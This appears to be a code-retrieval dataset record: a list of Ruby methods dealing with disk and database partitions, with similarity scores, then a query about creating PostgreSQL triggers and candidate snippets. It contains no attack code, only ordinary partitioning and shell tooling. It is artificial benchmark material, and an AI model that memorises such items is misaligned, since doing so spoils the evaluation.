\"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def partitioned_state\n super\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def query_partitions(partition_filter, statement, options = nil)\n policy = create_policy(options, QueryPolicy, default_query_policy)\n new_policy = policy.clone\n\n nodes = @cluster.nodes\n if nodes.empty?\n raise Aerospike::Exceptions::Aerospike.new(Aerospike::ResultCode::SERVER_NOT_AVAILABLE, \"Query failed because cluster is empty.\")\n end\n\n # result recordset\n recordset = Recordset.new(policy.record_queue_size, 1, :query)\n tracker = PartitionTracker.new(policy, nodes, partition_filter)\n Thread.new do\n Thread.current.abort_on_exception = true\n QueryExecutor.query_partitions(@cluster, policy, tracker, statement, recordset)\n end\n\n recordset\n end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def parent_table_schema_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_schema_name)\n end",
"def parent_table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_name)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def hadoop_partition_args\n if options[:partition_fields]\n [\n '-partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner',\n jobconf(:output_field_separator),\n jobconf(:partition_fields),\n ]\n end\n end",
"def partitions(key, partitions)\n master = fnv_hash(key) % partitions.size\n selected = [master]\n nodes = [partitions[master]]\n current = (master + 1) % partitions.size\n\n # Walk clockwise around the ring of partitions, starting from the master partition.\n # The next few unique nodes in ring order are the replicas.\n while current != master && selected.size < @replicas\n if !nodes.include? partitions[current]\n nodes << partitions[current]\n selected << current\n end\n current = (current + 1) % partitions.size\n end\n\n selected\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def partition(arr, n)\n\nend",
"def isPartition(partition)\n partition = deep_copy(partition)\n AutoinstCommon.isValidObject(@fields, partition)\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def split_partitions\n partition_names = @list.map { |bin| bin.partition_names }.flatten\n partition_names.select { |name| partition_names.index(name) != partition_names.rindex(name) }.uniq\n end",
"def GetPartitionLst(tg, device)\n tg = deep_copy(tg)\n ret = []\n tmp = GetDiskPartitionTg(device, tg)\n Builtins.y2milestone(\"GetPartitionLst tmp:%1\", tmp)\n Builtins.foreach(tmp) do |m|\n disk = Ops.get_string(m, \"disk\", \"\")\n if Builtins.search(device, \"/dev/evms\") == 0 &&\n !Builtins.haskey(tg, disk)\n disk = \"/dev/evms\"\n end\n Builtins.y2debug(\"GetPartitionLst device=%1 disk=%2\", device, disk)\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"device\", \"\") == device\n end\n part = Builtins.filter(part) { |p| !Ops.get_boolean(p, \"delete\", false) }\n if Builtins.size(part) == 0 && Ops.is_integer?(Ops.get(m, \"nr\", 0))\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_integer(p, \"nr\", -1) == Ops.get_integer(m, \"nr\", 0)\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n if Builtins.size(part) == 0\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"name\", \"\") == Ops.get_string(m, \"nr\", \"\")\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n pa = Ops.get(part, 0, {})\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/mapper\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/loop\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n ret = Builtins.add(ret, pa) if Ops.greater_than(Builtins.size(pa), 0)\n end\n Builtins.y2debug(\"GetPartitionLst ret=%1\", ret)\n deep_copy(ret)\n end",
"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def table_elements(identifier)\n platform.tables_for(identifier.clone)\n end",
"def list_swap_partitions_with_type_and_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5\":\"$6;else {if ($5==\"82\") print $1\":\"$4\":\"$5}}' | sed s/+//g`.chomp.split\nend",
"def partition_pattern(prefix, partitioned)\n pattern = case partitioned\n when :weekly\n Array.new(8, '_').join\n when :monthly\n Array.new(6, '_').join\n else\n raise \"Unrecognized option for 'partitioned': #{partitioned}\"\n end\n \"#{prefix}_#{pattern}\"\n end",
"def partition(predicate)\n each_operand(predicate) do |operand|\n case operand\n when Axiom::Function::Binary then partition_binary(operand)\n when Axiom::Function::Unary then partition_unary(operand)\n when Axiom::Attribute::Boolean then partition_attribute(operand)\n else\n partition_proposition(operand)\n end\n end\n end",
"def bootloader_partitions\n raise RuntimeError, \"Not implemented in base class\"\n end",
"def supports_list_partitions?\n postgresql_version >= 100_000\n end",
"def indexes_on(partitioned_table)\n return [] if Gem::Version.new(Rails.version) >= Gem::Version.new('6.0.3')\n return [] unless connection.supports_indexes_on_partitioned_tables?\n\n Indexes.new(connection).on(partitioned_table)\n end",
"def available_partitions\n partitions.select(&:available?)\n end",
"def problem_76\n return 100.partitions - 1\nend",
"def partition( header, &block )\n data.partition( header, &block ).map { |d| dup.load( d ) }\n end",
"def partition_and_process_non_tabular_lines\n non_tabular_lines.each do |line|\n if line =~ @start_line_pattern\n # This is a start line\n start_record(line)\n elsif line =~ @end_line_pattern\n # This is an end line\n end_record(line)\n else\n @non_tabular_record << line if @in_a_record\n end\n end\n end",
"def partition_check_device(devicename)\n if External.cmd(@server, \"/usr/bin/sudo /sbin/fdisk -l #{devicename}\").include? \"Disk #{devicename} doesn't contain a valid partition table\"\n false\n else\n true\n end\n end",
"def partition\n @articles.each do |article|\n minimum_bucket(article['read_time'].to_i) << article\n end\n end",
"def IsPartitionable(entry)\n entry = deep_copy(entry)\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMRAID ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMMULTIPATH ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_MDPART ||\n IsRealDisk(entry)\n end",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def query(statement, options = nil)\n query_partitions(Aerospike::PartitionFilter.all, statement, options)\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n self.class.new.import(result[0]),\n self.class.new.import(result[1]),\n ]\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def FSCKPartition(partition)\n if !Mode.test\n detected_fs = Storage.DetectFs(partition)\n if detected_fs == :ext2\n # label, %1 is partition\n out = Builtins.sformat(_(\"Checking partition %1\"), partition)\n UI.OpenDialog(Opt(:decorated), Label(out))\n\n Builtins.y2milestone(\"command: /sbin/e2fsck -y %1\", partition)\n SCR.Execute(\n path(\".target.bash\"),\n Ops.add(\"/sbin/e2fsck -y \", partition)\n )\n\n UI.CloseDialog\n end\n end\n\n nil\n end",
"def setup\n @cypher_partition = CypherPartitioner.new\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def partition_devices(device_list, attempt = 0, max_attempts = 3)\n return false if attempt >= max_attempts\n\n puts case attempt\n when 0 then \"Partioning devices ...\" \n else \"Retrying device partitioning (attempt #{attempt + 1}) ...\" \n end\n\n device_list.each do |device|\n puts \" * #{device}\"\n `echo 0|sfdisk #{device}`\n end\n\n puts \"Sleeping 10 seconds to reload partition tables ...\"\n sleep 10\n\n # Verify all volumes were properly partitioned\n missing_devices = []\n device_list.each do |device|\n missing_devices << device unless File.exists?(\"#{device}1\")\n end\n\n # Retry partitioning for failed volumes\n response = true\n if missing_devices.size > 0\n response = partition_devices(missing_devices, attempt + 1, max_attempts)\n end\n response\n end",
"def supports_default_partitions?\n postgresql_version >= 110_000\n end",
"def delete_table_or_partition(table, dataset: nil)\n begin\n dataset ||= @dataset\n Embulk.logger.info { \"embulk-output-bigquery: Delete table... #{@destination_project}:#{dataset}.#{table}\" }\n with_network_retry { client.delete_table(@destination_project, dataset, table) }\n rescue Google::Apis::ServerError, Google::Apis::ClientError, Google::Apis::AuthorizationError => e\n if e.status_code == 404 && /Not found:/ =~ e.message\n # ignore 'Not Found' error\n return\n end\n\n response = {status_code: e.status_code, message: e.message, error_class: e.class}\n Embulk.logger.error {\n \"embulk-output-bigquery: delete_table(#{@destination_project}, #{dataset}, #{table}), response:#{response}\"\n }\n raise Error, \"failed to delete table #{@destination_project}:#{dataset}.#{table}, response:#{response}\"\n end\n end",
"def split(table_or_region_name, split_point = nil)\n split_point_bytes = nil\n split_point_bytes = split_point.to_java_bytes unless split_point.nil?\n begin\n if split_point_bytes.nil?\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes))\n else\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes, split_point_bytes))\n end\n rescue java.lang.IllegalArgumentException, org.apache.hadoop.hbase.UnknownRegionException\n if split_point_bytes.nil?\n @admin.split(TableName.valueOf(table_or_region_name))\n else\n @admin.split(TableName.valueOf(table_or_region_name), split_point_bytes)\n end\n end\n end",
"def shared_slice(hash_)\n offset_ = @offset\n select_set_ = {}\n hash_.each do |k_, v_|\n if (ainfo_ = @structure.axis(k_))\n aindex_ = ainfo_.axis_index\n unless select_set_.include?(aindex_)\n lindex_ = ainfo_.index(v_)\n if lindex_\n offset_ += ainfo_.step * lindex_\n select_set_[aindex_] = true\n end\n end\n end\n end\n Table.new(@structure.substructure_omitting(select_set_.keys),\n :acquire => @vals, :offset => offset_, :parent => self)\n end",
"def list_swap_partitions_with_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5;else {if ($5==\"82\") print $1\":\"$4}}' | sed s/+//g`.chomp.split\nend",
"def partitions_for(topic=nil)\n if topic.class == String && block_given?\n @j_del.java_method(:partitionsFor, [Java::java.lang.String.java_class,Java::IoVertxCore::Handler.java_class]).call(topic,(Proc.new { |ar| yield(ar.failed ? ar.cause : nil, ar.succeeded ? ar.result.to_a.map { |elt| elt != nil ? JSON.parse(elt.toJson.encode) : nil } : nil) }))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling partitions_for(#{topic})\"\n end",
"def n_partitions\n return 4 if is_qlogic_57810?\n return 2 if is_qlogic_57840?\n return 2 if is_qlogic_57800? && port.between?(1, 2)\n\n 1\n end",
"def supports_hash_partitions?\n postgresql_version >= 110_000\n end",
"def compute_table_list\n if @configuration.download_tables\n # If the list is explicitly set then use that\n tables = @configuration.download_tables.to_set\n else\n # Otherwise guess via the tables actually in the database\n tables = @adapter.guess_tables.to_set\n\n if @configuration.allow_tables\n # Only allow tables tables that we specify\n tables = tables.intersection @configuration.allow_tables\n end\n if @configuration.disallow_tables\n # Remove any tables that we don't want included\n tables = tables.difference @configuration.disallow_tables\n end\n end\n return tables\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def prepare_tables\n table_id = 0\n seen = {}\n\n sheets.each do |sheet|\n table_id += sheet.prepare_tables(table_id + 1, seen)\n end\n end",
"def create_download_session(table_name, partition = nil)\n if partition\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?partition=#{partition}&downloads\"\n else\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?downloads\"\n end\n res = ODPS.tunnel_conn.post do |req|\n req.url url\n req.headers['Content-Type'] = 'application/json'\n end\n JSON.parse res.body, {object_class: DownloadSession}\n end",
"def available_tables(sets_of_dishes, places_per_table)\n# dishes / seats\n return sets_of_dishes / places_per_table\nend",
"def roomer_set_table_name_prefix\n self.table_name_prefix = begin\n case @roomer_scope\n when :shared\n roomer_full_table_name_prefix(Roomer.shared_schema_name)\n when :tenanted\n roomer_full_table_name_prefix(Roomer.current_tenant.try(Roomer.tenant_schema_name_column))\n else\n \"\"\n end\n end\n end",
"def from(value)\n using(partition: value)\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def pdf_split(input, from, to, output)\n if from == to\n range = from\n else\n range = \"#{from}-#{to}\"\n end\n\n options = [\n input.shellescape,\n 'cat',\n range,\n 'output',\n output.shellescape\n ]\n `pdftk #{options.join(' ')}`\n end"
] |
[
"0.73860645",
"0.6674913",
"0.65416634",
"0.64847636",
"0.6425398",
"0.6288182",
"0.62805045",
"0.6146301",
"0.6127633",
"0.5911713",
"0.5668943",
"0.5609965",
"0.55949575",
"0.55547947",
"0.55140114",
"0.5512072",
"0.5481167",
"0.5452773",
"0.54395694",
"0.5434945",
"0.54194564",
"0.54121757",
"0.5404254",
"0.5380966",
"0.53635025",
"0.5323602",
"0.530532",
"0.5301687",
"0.529679",
"0.5294115",
"0.5282328",
"0.52526504",
"0.5235079",
"0.5230509",
"0.51774037",
"0.5171487",
"0.5168189",
"0.5163171",
"0.51526177",
"0.5135061",
"0.5131243",
"0.5091176",
"0.50828487",
"0.5074495",
"0.5072782",
"0.50674284",
"0.5061975",
"0.5060905",
"0.50525874",
"0.5042269",
"0.50398856",
"0.5035349",
"0.50307596",
"0.50253034",
"0.500785",
"0.49955168",
"0.49709845",
"0.49568474",
"0.49477535",
"0.494664",
"0.49138093",
"0.4909805",
"0.49037796",
"0.48967257",
"0.4893215",
"0.4891594",
"0.4854779",
"0.48545203",
"0.48525864",
"0.48374066",
"0.48370507",
"0.48254922",
"0.48215213",
"0.48212186",
"0.4812171",
"0.48004237",
"0.47952354",
"0.4782623",
"0.4758631",
"0.4744929",
"0.47322842",
"0.47195885",
"0.47085118",
"0.4705296",
"0.4689477",
"0.46780062",
"0.46759015",
"0.4672095",
"0.46665323",
"0.46417904",
"0.46375835",
"0.463587",
"0.4632197",
"0.46224514",
"0.4613458",
"0.46022734",
"0.4600769",
"0.45997867",
"0.45964113",
"0.45943615"
] |
0.58224213
|
10
|
Create a trigger in the database. Arguments: table :: the table on which this trigger operates name :: the name of this trigger function :: the function to call for this trigger, which should return type trigger. opts :: options hash: :after :: Calls the trigger after execution instead of before. :args :: An argument or array of arguments to pass to the function. :each_row :: Calls the trigger for each row instead of for each statement. :events :: Can be :insert, :update, :delete, or an array of any of those. Calls the trigger whenever that type of statement is used. By default, the trigger is called for insert, update, or delete. :replace :: Replace the trigger with the same name if it already exists (PostgreSQL 14+). :when :: A filter to use for the trigger
|
def create_trigger(table, name, function, opts=OPTS)
self << create_trigger_sql(table, name, function, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def create_trigger name, type, table_name, *actions\n create_function \"#{name}_f\", :returns=>'trigger',:as=>'$BODY$' do\n yield\n end\n execute %{CREATE TRIGGER #{name} #{type.to_s.upcase} #{actions.map{|str|str.upcase}.join(' OR ')}\n ON \"#{table_name}\" FOR EACH ROW\n EXECUTE PROCEDURE #{name}_f();}\n end",
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def create_trigger(database, table)\n options = self.options(table)\n\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => false,\n }\n\n event_filter = options[:event_filter]\n params[:filter_conditions] = event_filter.filter_conditions if event_filter.respond_to?(:filter_conditions)\n\n session.send(database).create_replication_trigger params\n end",
"def add_trigger(opts)\n opts = opts.with_indifferent_access\n t = Trigger.new\n t.check_id = opts[:check_id]\n t.metric_id = opts[:metric_id]\n t.set_severity(opts[:severity])\n t.sign = opts[:sign].to_sym\n t.threshold = opts[:threshold]\n t.status = array(opts[:status]).map{ |s| s.upcase }\n\n t.save!\n t\n end",
"def add_function_update_timestamp(opts={})\n if has_function?(:update_timestamp)\n # if we have it, overwrite it if force is set\n if !opts[:force] \n return true \n end\n end\n func=%Q{\n BEGIN\n NEW.updated_at := now();\n RETURN NEW;\n END;\n }\n self.db.create_function :update_timestamp, func, :replace => true, :returns => 'trigger', :language => 'plpgsql'\n end",
"def create_replication_trigger(params)\n create_or_replace_replication_trigger_function params\n\n %w(insert update delete).each do |action|\n execute(<<-end_sql)\n DROP TRIGGER IF EXISTS `#{params[:trigger_name]}_#{action}`;\n end_sql\n\n # The created triggers can handle the case where the trigger procedure\n # is updated (that is: temporarily deleted and recreated) while the\n # trigger is running.\n # For that an MySQL internal exception is raised if the trigger\n # procedure cannot be found. The exception is caught by an trigger\n # internal handler. \n # The handler causes the trigger to retry calling the\n # trigger procedure several times with short breaks in between.\n\n trigger_var = action == 'delete' ? 'OLD' : 'NEW'\n if action == 'update'\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause('OLD', params)}, #{key_clause('NEW', params)}, '#{action[0,1].upcase}');\"\n else\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause(trigger_var, params)}, null, '#{action[0,1].upcase}');\"\n end\n execute(<<-end_sql)\n CREATE TRIGGER `#{params[:trigger_name]}_#{action}`\n AFTER #{action} ON `#{params[:table]}` FOR EACH ROW BEGIN\n DECLARE number_attempts INT DEFAULT 0;\n DECLARE failed INT;\n DECLARE CONTINUE HANDLER FOR 1305 BEGIN\n DO SLEEP(0.05);\n SET failed = 1;\n SET number_attempts = number_attempts + 1;\n END;\n REPEAT\n SET failed = 0;\n #{call_statement}\n UNTIL failed = 0 OR number_attempts >= 40 END REPEAT;\n END;\n end_sql\n end\n\n end",
"def create_trigger(*args)\n username, arguments = extract_username(args)\n attrs = valid_trigger_attrs(arguments)\n\n post api_url(username, 'triggers'), attrs\n end",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def createTrigger _args\n \"createTrigger _args;\" \n end",
"def trigger_definition(table_name, trigger_name, name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(HColumnDescriptor.new(arg))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n @formatter.header()\n @formatter.footer(now)\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def create_table(*args, &block)\n apply_translatable_option!(:create_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
